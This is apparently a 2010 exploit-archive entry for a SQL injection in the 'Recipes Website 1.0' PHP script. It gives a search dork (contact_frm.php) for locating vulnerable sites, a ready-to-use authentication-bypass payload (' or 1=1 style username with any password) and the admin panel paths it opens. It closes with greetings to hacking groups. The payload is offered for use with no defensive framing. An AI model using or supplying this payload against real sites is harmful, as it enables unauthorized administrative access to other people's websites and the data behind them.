Recipes Website 1.0 SQL Injection

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Recipes Website 1.0 SQL Injection
# Published : 2010-05-22
# Author : Mr.ThieF
# Previous Title : ECShop Search.php SQL Injection Exploit
# Next Title : GVI-2010-02 : Multiple vulnerabilities in Open-AudIT

[~] Script: | Recipes Website 1.0 |
[~] Author : Mr.ThieF
[~] Contact : LinuxRooT--@hotmail.com <~
[~] DorK : contact_frm.php
[~] Software Link : http://www.scriptsfeed.com
[~] Date : 05-23-2010
[~] Version : 1.0
[~] CVE : 
[~] Exploit :

UserName : admin ' or ' 1=1  & or & ' or 1='1'#

PassworD : xx

Example:

http://[site]/[path]/Recipes_Website/control/

http://[site]/control/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
GreeTz : RENO <3 - Saudi ViruS TeaM <3 - MMA_LORD_735 <3 - Mr.NrFzH <3 - SaFa7-KsA <3 - T3rr0risT <3 - ALL My FrindS <3